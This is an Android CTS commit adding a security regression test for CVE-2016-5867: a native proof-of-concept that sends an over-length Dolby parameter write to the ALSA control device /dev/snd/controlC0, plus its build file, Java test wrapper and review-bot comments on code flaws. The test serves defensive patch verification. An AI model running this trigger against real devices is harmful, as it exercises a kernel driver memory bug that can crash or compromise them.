CTS test for Android Security b/72459993
Test: successful run of newly introduced CTS test case.
Bug: 72459993
Change-Id: Iae14408c77cd9bb2919461901c43d217dbb9bd7d
(cherry picked from commit 6a32786ef4fa6c43b774aa517eaf0523ad7bc980)
(cherry picked from commit 6fd6e2dbf89cde1ca03841b275552087ca9bd90d)
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index e821ce5..f5b5aa8 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -128,6 +128,7 @@
<!-- Bulletin 2017-05 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
<option name="push" value="CVE-2016-5862->/data/local/tmp/CVE-2016-5862"/>
+ <option name="push" value="CVE-2016-5867->/data/local/tmp/CVE-2016-5867"/>
<!--__________________-->
<!-- Bulletin 2017-06 -->
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-5867/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2016-5867/Android.mk
new file mode 100644
index 0000000..f7968eb
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-5867/Android.mk
@@ -0,0 +1,16 @@
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-5867
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_COMPATIBILITY_SUITE := cts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS := -Wall -Werror
+
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-5867/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2016-5867/poc.c
new file mode 100644
index 0000000..c8e4a20
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-5867/poc.c
@@ -0,0 +1,63 @@
+/*
+ * CVE-2016-5867
+ */
+
+#include "../includes/common.h"
+#include <fcntl.h>
+#include <sound/asound.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <unistd.h>
+
+#define DOLBY_SET_PARAM "DS1 DAP Set Param"
+#define NUM_BLOCKS 16384
+#define DOLBY_PARAM_ID_VDHE 0x0001074D
+#define TOTAL_LENGTH_DOLBY_PARAM 745
+
+unsigned int get_doblycontrolid(int fd) {
+ unsigned int i;
+ int ret = -1;
+ unsigned int id = 0;
+ struct snd_ctl_elem_list lst;
+ memset(&lst, 0, sizeof(lst));
+ lst.pids = calloc(NUM_BLOCKS, sizeof(struct snd_ctl_elem_list));
+ lst.space = NUM_BLOCKS;
+ ret = ioctl(fd, SNDRV_CTL_IOCTL_ELEM_LIST, &lst);
+ if (ret < 0) {
+ return 0;
+ }
+ for (i = 0; i < lst.count; i++) {
+ if (!strncmp((const char *)lst.pids[i].name, DOLBY_SET_PARAM,
+ (sizeof(DOLBY_SET_PARAM) - 1))) {
+ id = lst.pids[i].numid;
+ break;
+ }
+ }
+ free(lst.pids);
+ return id;
+}
+
+int main(){
+ int fd = -1;
+ struct snd_ctl_elem_value control;
+ int ret;
+ fd = open("/dev/snd/controlC0", O_RDWR);
+ if(fd < 0) {
+ return EXIT_FAILURE;
+ }
+ memset(&control, 0, sizeof(control));
+ control.id.numid = get_doblycontrolid(fd);
+ if(control.id.numid) {
+ control.value.integer.value[1] = DOLBY_PARAM_ID_VDHE;
+ control.value.integer.value[3] = TOTAL_LENGTH_DOLBY_PARAM +1;
+ ret = ioctl(fd, SNDRV_CTL_IOCTL_ELEM_WRITE, &control);
+ if(ret == 0) {
+ close(fd);
+ return EXIT_VULNERABLE;
+ }
+ }
+ close(fd);
+ return EXIT_SUCCESS;
+}
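Review bot: In get_doblycontrolid the scan loop is bounded by `lst.count`, which the ALSA uapi header describes as the count of all elements, while `lst.used` is the number of ids the kernel actually wrote into `pids`. On a device reporting more than NUM_BLOCKS controls, the loop would read past the allocation. The `calloc` is also sized with `sizeof(struct snd_ctl_elem_list)` rather than the element type of `pids`, its result is never checked, and the buffer is leaked on the `ret < 0` return. Because every failure path returns 0 and main then exits with EXIT_SUCCESS, a failed lookup is reported as not vulnerable without the driver being exercised; a distinct exit code or a log line would make that visible.

```c
unsigned int get_doblycontrolid(int fd) {
  // … unchanged: local declarations, memset of lst …
  lst.pids = calloc(NUM_BLOCKS, sizeof(*lst.pids));
  if (lst.pids == NULL) {
    return 0;
  }
  lst.space = NUM_BLOCKS;
  ret = ioctl(fd, SNDRV_CTL_IOCTL_ELEM_LIST, &lst);
  if (ret < 0) {
    free(lst.pids);
    return 0;
  }
  /* Only the first lst.used entries were filled in by the kernel. */
  for (i = 0; i < lst.used; i++) {
    // … unchanged: name comparison against DOLBY_SET_PARAM, then free and return id …
```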
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
index eb7b29f..70e224a 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
@@ -60,4 +60,14 @@
AdbUtils.runPocNoOutput("CVE-2016-5862",getDevice(), 60);
}
}
+
+ /**
+ * CVE-2016-5867
+ */
+ @SecurityTest(minPatchLevel = "2017-05")
+ public void testPocCVE_2016_5867() throws Exception {
+ if (containsDriver(getDevice(), "/dev/snd/controlC0")) {
+ AdbUtils.runPocAssertExitStatusNotVulnerable("CVE-2016-5867", getDevice(), 60);
+ }
+ }
}
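Review bot: The Javadoc on testPocCVE_2016_5867 carries only the CVE id and does not say what a pass means. The body is skipped when `/dev/snd/controlC0` is absent, and per poc.c in this commit the binary also exits with success when the "DS1 DAP Set Param" control is not found, so a green result covers both "write rejected" and "driver not exercised". I would state that in the comment, e.g. `/** CVE-2016-5867: runs the native PoC against /dev/snd/controlC0; passes when the over-length Dolby parameter write is rejected, and also when the device node or control is absent. */`. The enclosing class starts outside the hunk.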